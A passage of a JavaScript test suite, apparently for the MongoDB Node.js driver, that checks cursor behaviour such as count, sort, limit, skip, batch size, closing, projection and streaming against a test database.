x: i }, configuration.writeConcernMax(), function(e) { test.equal(null, e); total = total - 1; if (total === 0) callback(); }); } } function finished() { collection.find().count(function(err, count) { test.equal(null, err); test.equal(10, count); test.ok(count.constructor === Number); collection.find({}, { limit: 5 }).count(function(err, count) { test.equal(null, err); test.equal(5, count); collection.find({}, { skip: 5 }).count(function(err, count) { test.equal(null, err); test.equal(5, count); db.collection('acollectionthatdoesn').count(function(err, count) { test.equal(null, err); test.equal(0, count); var cursor = collection.find(); cursor.count(function(err, count) { test.equal(null, err); test.equal(10, count); cursor.each(function(err, item) { test.equal(null, err); if (item == null) { cursor.count(function(err, count2) { test.equal(null, err); test.equal(10, count2); test.equal(count, count2); // Let's close the db client.close(); done(); }); } }); }); }); }); }); }); } insert(function() { finished(); }); }); }); }); } }); it('Should correctly execute cursor count with secondary readPreference', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: 'replicaset' } }, // The actual test we wish to run test: function(done) { const configuration = this.configuration; const client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect((err, client) => { const db = client.db(configuration.db); let internalClientCursor; if (configuration.usingUnifiedTopology()) { internalClientCursor = sinon.spy(client.topology, 'cursor'); } else { internalClientCursor = sinon.spy(client.topology.s.coreTopology, 'cursor'); } const expectedReadPreference = new ReadPreference(ReadPreference.SECONDARY); const cursor = db.collection('countTEST').find({ qty: { $gt: 4 } }); cursor.count(true, { readPreference: ReadPreference.SECONDARY }, err => { expect(err).to.be.null; expect(internalClientCursor.getCall(0).args[2]) .to.have.nested.property('readPreference') .that.deep.equals(expectedReadPreference); client.close(); done(); }); }); } }); /** * @ignore * @api private */ it('shouldCorrectlyExecuteCursorCountWithDottedCollectionName', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('test_count.ext', function(err, collection) { test.equal(null, err); collection.find().count(function(err) { test.equal(null, err); function insert(callback) { var total = 10; for (var i = 0; i < 10; i++) { collection.insert({ x: i }, configuration.writeConcernMax(), function(e) { test.equal(null, e); total = total - 1; if (total === 0) callback(); }); } } function finished() { collection.find().count(function(err, count) { test.equal(null, err); test.equal(10, count); test.ok(count.constructor === Number); collection.find({}, { limit: 5 }).count(function(err, count) { test.equal(null, err); test.equal(5, count); collection.find({}, { skip: 5 }).count(function(err, count) { test.equal(null, err); test.equal(5, count); db.collection('acollectionthatdoesn').count(function(err, count) { test.equal(null, err); test.equal(0, count); var cursor = collection.find(); cursor.count(function(err, count) { test.equal(null, err); test.equal(10, count); cursor.each(function(err, item) { test.equal(null, err); if (item == null) { cursor.count(function(err, count2) { test.equal(null, err); test.equal(10, count2); test.equal(count, count2); // Let's close the db client.close(); done(); }); } }); }); }); }); }); }); } insert(function() { finished(); }); }); }); }); } }); /** * @ignore * @api private */ it('shouldCorrectlyExecuteSortOnCursor', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('test_sort', function(err, collection) { test.equal(null, err); function insert(callback) { var total = 10; for (var i = 0; i < 10; i++) { collection.insert({ x: i }, configuration.writeConcernMax(), function(e) { test.equal(null, e); total = total - 1; if (total === 0) callback(); }); } } function f() { var number_of_functions = 9; var finished = function() { number_of_functions = number_of_functions - 1; if (number_of_functions === 0) { client.close(); done(); } }; var cursor = collection.find().sort(['a', 1]); test.deepEqual(['a', 1], cursor.sortValue); finished(); cursor = collection.find().sort('a', 1); test.deepEqual([['a', 1]], cursor.sortValue); finished(); cursor = collection.find().sort('a', -1); test.deepEqual([['a', -1]], cursor.sortValue); finished(); cursor = collection.find().sort('a', 'asc'); test.deepEqual([['a', 'asc']], cursor.sortValue); finished(); cursor = collection.find().sort([['a', -1], ['b', 1]]); var entries = cursor.sortValue.entries(); test.deepEqual(['a', -1], entries.next().value); test.deepEqual(['b', 1], entries.next().value); finished(); cursor = collection .find() .sort('a', 1) .sort('a', -1); test.deepEqual([['a', -1]], cursor.sortValue); finished(); cursor.next(function(err) { test.equal(null, err); try { cursor.sort(['a']); } catch (err) { test.equal('Cursor is closed', err.message); finished(); } }); collection .find() .sort('a', 25) .next(function(err) { test.equal( "Illegal sort clause, must be of the form [['field1', '(ascending|descending)'], ['field2', '(ascending|descending)']]", err.message ); finished(); }); collection .find() .sort(25) .next(function(err) { test.equal( "Illegal sort clause, must be of the form [['field1', '(ascending|descending)'], ['field2', '(ascending|descending)']]", err.message ); finished(); }); } insert(function() { f(); }); }); }); } }); /** * @ignore * @api private */ it('shouldThrowErrorOnEachWhenMissingCallback', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('test_each', function(err, collection) { test.equal(null, err); function insert(callback) { var total = 10; for (var i = 0; i < 10; i++) { collection.insert({ x: i }, configuration.writeConcernMax(), function(e) { test.equal(null, e); total = total - 1; if (total === 0) callback(); }); } } function finished() { collection.find(function(err, cursor) { test.equal(null, err); test.throws(function() { cursor.each(); }); client.close(); done(); }); } insert(function() { finished(); }); }); }); } }); /** * @ignore * @api private */ it('shouldCorrectlyHandleLimitOnCursor', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { var db = client.db(configuration.db); db.createCollection('test_cursor_limit', function(err, collection) { function insert(callback) { var total = 10; for (var i = 0; i < 10; i++) { collection.insert({ x: i }, configuration.writeConcernMax(), function(e) { test.equal(null, e); total = total - 1; if (total === 0) callback(); }); } } function finished() { collection .find() .limit(5) .toArray(function(err, items) { test.equal(5, items.length); // Let's close the db test.equal(null, err); client.close(); done(); }); } insert(function() { finished(); }); }); }); } }); /** * @ignore * @api private */ it('shouldCorrectlyHandleNegativeOneLimitOnCursor', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('test_cursor_negative_one_limit', function(err, collection) { test.equal(null, err); function insert(callback) { var total = 10; for (var i = 0; i < 10; i++) { collection.insert({ x: i }, configuration.writeConcernMax(), function(e) { test.equal(null, e); total = total - 1; if (total === 0) callback(); }); } } function finished() { collection .find() .limit(-1) .toArray(function(err, items) { test.equal(null, err); test.equal(1, items.length); // Let's close the db client.close(); done(); }); } insert(function() { finished(); }); }); }); } }); /** * @ignore * @api private */ it('shouldCorrectlyHandleAnyNegativeLimitOnCursor', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('test_cursor_any_negative_limit', function(err, collection) { test.equal(null, err); function insert(callback) { var total = 10; for (var i = 0; i < 10; i++) { collection.insert({ x: i }, configuration.writeConcernMax(), function(e) { test.equal(null, e); total = total - 1; if (total === 0) callback(); }); } } function finished() { collection .find() .limit(-5) .toArray(function(err, items) { test.equal(null, err); test.equal(5, items.length); // Let's close the db client.close(); done(); }); } insert(function() { finished(); }); }); }); } }); /** * @ignore * @api private */ it('shouldCorrectlyReturnErrorsOnIllegalLimitValues', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('test_limit_exceptions', function(err, collection) { test.equal(null, err); collection.insert({ a: 1 }, configuration.writeConcernMax(), function(err) { test.equal(null, err); }); collection.find(function(err, cursor) { test.equal(null, err); try { cursor.limit('not-an-integer'); } catch (err) { test.equal('limit requires an integer', err.message); } try { cursor.limit('not-an-integer'); test.ok(false); } catch (err) { test.equal('limit requires an integer', err.message); } }); collection.find(function(err, cursor) { test.equal(null, err); cursor.close(function(err, cursor) { test.equal(null, err); try { cursor.limit(1); } catch (err) { test.equal('Cursor is closed', err.message); } collection.find(function(err, cursor) { test.equal(null, err); cursor.next(function(err) { test.equal(null, err); try { cursor.limit(1); } catch (err) { test.equal('Cursor is closed', err.message); } try { cursor.limit(1); test.ok(false); } catch (err) { test.equal('Cursor is closed', err.message); } client.close(); done(); }); }); try { cursor.limit(1); test.ok(false); } catch (err) { test.equal('Cursor is closed', err.message); } }); }); }); }); } }); /** * @ignore * @api private */ it('shouldCorrectlySkipRecordsOnCursor', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('test_skip', function(err, collection) { test.equal(null, err); function insert(callback) { var total = 10; for (var i = 0; i < 10; i++) { collection.insert({ x: i }, configuration.writeConcernMax(), function(e) { test.equal(null, e); total = total - 1; if (total === 0) callback(); }); } } function finished() { collection.find(function(err, cursor) { test.equal(null, err); cursor.count(function(err, count) { test.equal(null, err); test.equal(10, count); }); }); collection.find(function(err, cursor) { test.equal(null, err); cursor.toArray(function(err, items) { test.equal(null, err); test.equal(10, items.length); collection .find() .skip(2) .toArray(function(err, items2) { test.equal(null, err); test.equal(8, items2.length); // Check that we have the same elements var numberEqual = 0; var sliced = items.slice(2, 10); for (var i = 0; i < sliced.length; i++) { if (sliced[i].x === items2[i].x) numberEqual = numberEqual + 1; } test.equal(8, numberEqual); // Let's close the db client.close(); done(); }); }); }); } insert(function() { finished(); }); }); }); } }); /** * @ignore * @api private */ it('shouldCorrectlyReturnErrorsOnIllegalSkipValues', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('test_skip_exceptions', function(err, collection) { test.equal(null, err); collection.insert({ a: 1 }, configuration.writeConcernMax(), function(err) { test.equal(null, err); }); try { collection.find().skip('not-an-integer'); } catch (err) { test.equal('skip requires an integer', err.message); } var cursor = collection.find(); cursor.next(function(err) { test.equal(null, err); try { cursor.skip(1); } catch (err) { test.equal('Cursor is closed', err.message); } var cursor2 = collection.find(); cursor2.close(function(err) { test.equal(null, err); try { cursor2.skip(1); } catch (err) { test.equal('Cursor is closed', err.message); } client.close(); done(); }); }); }); }); } }); /** * @ignore * @api private */ it('shouldReturnErrorsOnIllegalBatchSizes', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('test_batchSize_exceptions', function(err, collection) { test.equal(null, err); collection.insert({ a: 1 }, configuration.writeConcernMax(), function(err) { test.equal(null, err); }); var cursor = collection.find(); try { cursor.batchSize('not-an-integer'); test.ok(false); } catch (err) { test.equal('batchSize requires an integer', err.message); } cursor = collection.find(); cursor.next(function(err) { test.equal(null, err); cursor.next(function(err) { test.equal(null, err); try { cursor.batchSize(1); test.ok(false); } catch (err) { test.equal('Cursor is closed', err.message); } var cursor2 = collection.find(); cursor2.close(function(err) { test.equal(null, err); try { cursor2.batchSize(1); test.ok(false); } catch (err) { test.equal('Cursor is closed', err.message); } client.close(); done(); }); }); }); }); }); } }); /** * @ignore * @api private */ it('shouldCorrectlyHandleChangesInBatchSizes', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('test_not_multiple_batch_size', function(err, collection) { test.equal(null, err); var records = 6; var batchSize = 2; var docs = []; for (var i = 0; i < records; i++) { docs.push({ a: i }); } collection.insert(docs, configuration.writeConcernMax(), function() { test.equal(null, err); collection.find({}, { batchSize: batchSize }, function(err, cursor) { test.equal(null, err); //1st cursor.next(function(err, items) { test.equal(null, err); //cursor.items should contain 1 since nextObject already popped one test.equal(1, cursor.bufferedCount()); test.ok(items != null); //2nd cursor.next(function(err, items) { test.equal(null, err); test.equal(0, cursor.bufferedCount()); test.ok(items != null); //test batch size modification on the fly batchSize = 3; cursor.batchSize(batchSize); //3rd cursor.next(function(err, items) { test.equal(null, err); test.equal(2, cursor.bufferedCount()); test.ok(items != null); //4th cursor.next(function(err, items) { test.equal(null, err); test.equal(1, cursor.bufferedCount()); test.ok(items != null); //5th cursor.next(function(err, items) { test.equal(null, err); test.equal(0, cursor.bufferedCount()); test.ok(items != null); //6th cursor.next(function(err, items) { test.equal(null, err); test.equal(0, cursor.bufferedCount()); test.ok(items != null); //No more cursor.next(function(err, items) { test.equal(null, err); test.ok(items == null); test.ok(cursor.isClosed()); client.close(); done(); }); }); }); }); }); }); }); }); }); }); }); } }); /** * @ignore * @api private */ it('shouldCorrectlyHandleBatchSize', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('test_multiple_batch_size', function(err, collection) { test.equal(null, err); //test with the last batch that is a multiple of batchSize var records = 4; var batchSize = 2; var docs = []; for (var i = 0; i < records; i++) { docs.push({ a: i }); } collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); collection.find({}, { batchSize: batchSize }, function(err, cursor) { test.equal(null, err); //1st cursor.next(function(err, items) { test.equal(null, err); test.equal(1, cursor.bufferedCount()); test.ok(items != null); //2nd cursor.next(function(err, items) { test.equal(null, err); test.equal(0, cursor.bufferedCount()); test.ok(items != null); //3rd cursor.next(function(err, items) { test.equal(null, err); test.equal(1, cursor.bufferedCount()); test.ok(items != null); //4th cursor.next(function(err, items) { test.equal(null, err); test.equal(0, cursor.bufferedCount()); test.ok(items != null); //No more cursor.next(function(err, items) { test.equal(null, err); test.ok(items == null); test.ok(cursor.isClosed()); client.close(); done(); }); }); }); }); }); }); }); }); }); } }); /** * @ignore * @api private */ it('shouldHandleWhenLimitBiggerThanBatchSize', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('test_limit_greater_than_batch_size', function(err, collection) { test.equal(null, err); var limit = 4; var records = 10; var batchSize = 3; var docs = []; for (var i = 0; i < records; i++) { docs.push({ a: i }); } collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); var cursor = collection.find({}, { batchSize: batchSize, limit: limit }); //1st cursor.next(function(err) { test.equal(null, err); test.equal(2, cursor.bufferedCount()); //2nd cursor.next(function(err) { test.equal(null, err); test.equal(1, cursor.bufferedCount()); //3rd cursor.next(function(err) { test.equal(null, err); test.equal(0, cursor.bufferedCount()); //4th cursor.next(function(err) { test.equal(null, err); //No more cursor.next(function(err, items) { test.equal(null, err); test.ok(items == null); test.ok(cursor.isClosed()); client.close(); done(); }); }); }); }); }); }); }); }); } }); /** * @ignore * @api private */ it('shouldHandleLimitLessThanBatchSize', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('test_limit_less_than_batch_size', function(err, collection) { test.equal(null, err); var limit = 2; var records = 10; var batchSize = 4; var docs = []; for (var i = 0; i < records; i++) { docs.push({ a: i }); } collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); var cursor = collection.find({}, { batchSize: batchSize, limit: limit }); //1st cursor.next(function(err) { test.equal(null, err); test.equal(1, cursor.bufferedCount()); //2nd cursor.next(function(err) { test.equal(null, err); test.equal(0, cursor.bufferedCount()); //No more cursor.next(function(err, items) { test.equal(null, err); test.ok(items == null); test.ok(cursor.isClosed()); client.close(); done(); }); }); }); }); }); }); } }); /** * @ignore * @api private */ it('shouldHandleSkipLimitChaining', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); var collection = db.collection('shouldHandleSkipLimitChaining'); function insert(callback) { var total = 10; for (var i = 0; i < 10; i++) { collection.insert({ x: i }, configuration.writeConcernMax(), function(e) { test.equal(null, e); total = total - 1; if (total === 0) callback(); }); } } function finished() { collection.find().toArray(function(err, items) { test.equal(null, err); test.equal(10, items.length); collection .find() .limit(5) .skip(3) .toArray(function(err, items2) { test.equal(null, err); test.equal(5, items2.length); // Check that we have the same elements var numberEqual = 0; var sliced = items.slice(3, 8); for (var i = 0; i < sliced.length; i++) { if (sliced[i].x === items2[i].x) numberEqual = numberEqual + 1; } test.equal(5, numberEqual); // Let's close the db client.close(); done(); }); }); } insert(function() { finished(); }); }); } }); /** * @ignore * @api private */ it('shouldCorrectlyHandleLimitSkipChainingInline', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('test_limit_skip_chaining_inline', function(err, collection) { test.equal(null, err); function insert(callback) { var total = 10; for (var i = 0; i < 10; i++) { collection.insert({ x: i }, configuration.writeConcernMax(), function(e) { test.equal(null, e); total = total - 1; if (total === 0) callback(); }); } } function finished() { collection.find().toArray(function(err, items) { test.equal(null, err); test.equal(10, items.length); collection .find() .limit(5) .skip(3) .toArray(function(err, items2) { test.equal(null, err); test.equal(5, items2.length); // Check that we have the same elements var numberEqual = 0; var sliced = items.slice(3, 8); for (var i = 0; i < sliced.length; i++) { if (sliced[i].x === items2[i].x) numberEqual = numberEqual + 1; } test.equal(5, numberEqual); // Let's close the db client.close(); done(); }); }); } insert(function() { finished(); }); }); }); } }); /** * @ignore * @api private */ it('shouldCloseCursorNoQuerySent', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('test_close_no_query_sent', function(err, collection) { test.equal(null, err); collection.find().close(function(err, cursor) { test.equal(null, err); test.equal(true, cursor.isClosed()); // Let's close the db client.close(); done(); }); }); }); } }); /** * @ignore * @api private */ it('shouldCorrectlyRefillViaGetMoreCommand', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var COUNT = 1000; var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('test_refill_via_get_more', function(err, collection) { test.equal(null, err); function insert(callback) { var docs = []; for (var i = 0; i < COUNT; i++) { docs.push({ a: i }); } collection.insertMany(docs, configuration.writeConcernMax(), callback); } function finished() { collection.count(function(err, count) { test.equal(null, err); test.equal(COUNT, count); }); var total = 0; collection.find({}, {}).each(function(err, item) { test.equal(null, err); if (item != null) { total = total + item.a; } else { test.equal(499500, total); collection.count(function(err, count) { test.equal(null, err); test.equal(COUNT, count); }); collection.count(function(err, count) { test.equal(null, err); test.equal(COUNT, count); var total2 = 0; collection.find().each(function(err, item) { test.equal(null, err); if (item != null) { total2 = total2 + item.a; } else { test.equal(499500, total2); collection.count(function(err, count) { test.equal(null, err); test.equal(COUNT, count); test.equal(total, total2); // Let's close the db client.close(); done(); }); } }); }); } }); } insert(function() { finished(); }); }); }); } }); /** * @ignore * @api private */ it('shouldCorrectlyRefillViaGetMoreAlternativeCollection', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('test_refill_via_get_more_alt_coll', function(err, collection) { test.equal(null, err); var COUNT = 1000; function insert(callback) { var docs = []; for (var i = 0; i < COUNT; i++) { docs.push({ a: i }); } collection.insertMany(docs, configuration.writeConcernMax(), callback); } function finished() { collection.count(function(err, count) { test.equal(null, err); test.equal(1000, count); }); var total = 0; collection.find().each(function(err, item) { test.equal(null, err); if (item != null) { total = total + item.a; } else { test.equal(499500, total); collection.count(function(err, count) { test.equal(null, err); test.equal(1000, count); }); collection.count(function(err, count) { test.equal(null, err); test.equal(1000, count); var total2 = 0; collection.find().each(function(err, item) { test.equal(null, err); if (item != null) { total2 = total2 + item.a; } else { test.equal(499500, total2); collection.count(function(err, count) { test.equal(null, err); test.equal(1000, count); test.equal(total, total2); // Let's close the db client.close(); done(); }); } }); }); } }); } insert(function() { finished(); }); }); }); } }); /** * @ignore * @api private */ it('shouldCloseCursorAfterQueryHasBeenSent', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('test_close_after_query_sent', function(err, collection) { test.equal(null, err); collection.insert({ a: 1 }, configuration.writeConcernMax(), function(err) { test.equal(null, err); var cursor = collection.find({ a: 1 }); cursor.next(function(err) { test.equal(null, err); cursor.close(function(err, cursor) { test.equal(null, err); test.equal(true, cursor.isClosed()); // Let's close the db client.close(); done(); }); }); }); }); }); } }); /** * @ignore * @api private */ it('shouldCorrectlyExecuteCursorCountWithFields', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('test_count_with_fields', function(err, collection) { test.equal(null, err); collection.save({ x: 1, a: 2 }, configuration.writeConcernMax(), function(err) { test.equal(null, err); collection .find({}) .project({ a: 1 }) .toArray(function(err, items) { test.equal(null, err); test.equal(1, items.length); test.equal(2, items[0].a); test.equal(undefined, items[0].x); client.close(); done(); }); }); }); }); } }); /** * @ignore * @api private */ it('shouldCorrectlyCountWithFieldsUsingExclude', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('test_count_with_fields_using_exclude', function(err, collection) { test.equal(null, err); collection.save({ x: 1, a: 2 }, configuration.writeConcernMax(), function(err) { test.equal(null, err); collection.find({}, { fields: { x: 0 } }).toArray(function(err, items) { test.equal(null, err); test.equal(1, items.length); test.equal(2, items[0].a); test.equal(undefined, items[0].x); client.close(); done(); }); }); }); }); } }); /** * @ignore * @api private */ it('Should correctly execute count on cursor', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var docs = []; for (var i = 0; i < 1000; i++) { var d = new Date().getTime() + i * 1000; docs[i] = { a: i, createdAt: new Date(d) }; } var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('Should_correctly_execute_count_on_cursor_1', function( err, collection ) { test.equal(null, err); // insert all docs collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); var total = 0; // Create a cursor for the content var cursor = collection.find({}); cursor.count(function(err) { test.equal(null, err); // Ensure each returns all documents cursor.each(function(err, item) { test.equal(null, err); if (item != null) { total++; } else { cursor.count(function(err, c) { test.equal(null, err); test.equal(1000, c); test.equal(1000, total); client.close(); done(); }); } }); }); }); }); }); } }); /** * @ignore * @api private */ it('should be able to stream documents', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var docs = []; for (var i = 0; i < 1000; i++) { docs[i] = { a: i + 1 }; } var count = 0; var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('Should_be_able_to_stream_documents', function(err, collection) { test.equal(null, err); // insert all docs collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); var paused = 0, closed = 0, resumed = 0, i = 0; var stream = collection.find().stream(); stream.on('data', function(doc) { test.equal(true, !!doc); test.equal(true, !!doc.a); count = count + 1; if (paused > 0 && 0 === resumed) { err = new Error('data emitted during pause'); return testDone(); } if (++i === 3) { stream.pause(); paused++; setTimeout(function() { stream.resume(); resumed++; }, 20); } }); stream.once('error', function(er) { err = er; testDone(); }); stream.once('end', function() { closed++; testDone(); }); function testDone() { test.equal(null, err); test.equal(i, docs.length); test.equal(1, closed); test.equal(1, paused); test.equal(1, resumed); test.strictEqual(stream.isClosed(), true); client.close(); done(); } }); }); }); } }); /** * @ignore * @api private */ it('immediately destroying a stream prevents the query from executing', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var i = 0, docs = [{ b: 2 }, { b: 3 }], doneCalled = 0; var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection( 'immediately_destroying_a_stream_prevents_the_query_from_executing', function(err, collection) { test.equal(null, err); // insert all docs collection.insert(docs, 